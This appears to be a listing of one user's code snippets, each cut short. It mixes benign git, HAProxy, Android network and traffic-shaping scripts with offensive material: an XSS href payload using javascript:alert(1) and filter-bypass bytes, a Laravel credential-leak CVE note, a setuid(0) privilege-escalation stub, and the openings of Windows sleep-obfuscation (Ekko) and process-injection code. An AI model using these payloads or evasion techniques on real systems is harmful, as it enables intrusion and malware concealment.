petarbojic

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

petarbojic

CVE-ID: CVE-2024-29291

Description:

A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

Additional Information:

None.

petarbojic

// by @irsdl
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`:
// 1- Characters that are ignored when present in the domain name.
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me`
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/
// I am sure this must have been looked at before but I cannot find a reference

for (let i = 0; i <= 0xFFFF; i++) {
    const unicodeChar = String.fromCharCode(i);
    const urlString = `http://sorous${unicodeChar}h.me/blog/`;

petarbojic

# clone all your repos with gh cli tool
gh repo list --json name -q '.[].name' | xargs -n1 gh repo clone

# List all files in a folder in a git repository by last commit date
git ls-tree --name-only HEAD | while read filename; do echo "$(git log -1 --format="%ci " -- $filename) $filename"; done | sort -r

# zip up an archive of each commit
for i in `git log --format=%H`; do git archive $i --format=zip -o $i.zip; done

# zip up an archive of each commit

petarbojic

#!/system/bin/sh
#
echo 0 > /proc/sys/net/ipv6/conf/default/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/default/disable_ipv6
echo 0 > /proc/sys/net/ipv6/conf/all/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6
echo 0 > /proc/sys/net/ipv6/conf/wlan0/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/wlan0/disable_ipv6
sleep 3
echo 0 > /proc/sys/net/ipv6/conf/default/accept_ra

petarbojic

# Haproxy configuration for SSL request passthrough to different backend based on SNI read from Handshaking stage
# The Loadbalance will not decode the encrpted data but transparently transfer to the backend server in Private subnet.
# With such configuration, you can install multiply services with its own SSL certificate in backend in different EC2 instance, but only explosure to public internet with one Loadbalance IP. There is no need to install SSL certificate in Loadbalancer level.

# Ref:
#	How to support wildcard sni: https://stackoverflow.com/questions/24839318/haproxy-reverse-proxy-sni-wildcard
#	https://www.haproxy.com/blog/enhanced-ssl-load-balancing-with-server-name-indication-sni-tls-extension/
#	https://stuff-things.net/2016/11/30/haproxy-sni/

petarbojic

user@hostname:~/exploit$ cat > test.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {

petarbojic

#!/bin/bash

# As the "bufferbloat" folks have recently re-discovered and/or more widely
# publicized, congestion avoidance algorithms (such as those found in TCP) do
# a great job of allowing network endpoints to negotiate transfer rates that
# maximize a link's bandwidth usage without unduly penalizing any particular
# stream. This allows bulk transfer streams to use the maximum available
# bandwidth without affecting the latency of non-bulk (e.g. interactive)
# streams.

petarbojic

#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>

SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

{

petarbojic

#include <Windows.h>
#include <stdio.h>


#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

typedef struct _UNICODE_STRING {